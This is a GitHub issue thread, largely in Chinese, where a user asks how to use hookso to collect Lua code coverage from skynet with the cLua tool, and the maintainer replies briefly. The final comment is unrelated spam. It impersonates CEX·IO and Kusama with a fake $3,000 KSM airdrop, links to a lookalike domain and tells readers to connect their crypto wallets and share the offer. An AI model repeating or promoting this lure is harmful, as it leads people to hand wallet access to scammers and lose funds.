### ISSUE TITLE
cLua 集成 skynet

### ISSUE THREAD

**Issue by rakuv3r** [esrrhs/cLua#2]
您好，我如何通过 hookso 的方式去获取 skynet 的 lua 代码覆盖率呢。

我尝试写了一个阻塞的 demo 代码。
```lua
local os = require "os"
local cc = package.loadlib("/usr/local/lib/liblua.so", "settop")

while(true)
do
    os.execute("sleep 1")
end
```

当我使用 ./hookso arg $PID liblua.so lua_settop 1 去获取 sethook 的地址时他的表现是阻塞的。
通过 strace 查看。
```
[{WIFSTOPPED(s) && WSTOPSIG(s) == SIGCHLD}], 0, NULL) = 8339
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_TRAPPED, si_pid=8339, si_uid=0, si_status=SIGCHLD, si_utime=1, si_stime=24} ---
ptrace(PTRACE_CONT, 8339, NULL, SIG_0)  = 0
wait4(8339,
```
它似乎在等待程序退出。

期待您的回复。

**Comment by esrrhs** [comment]
skynet是多线程魔改过的lua，不确定能否支持。试试直接嵌入lua脚本中使用呢？

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
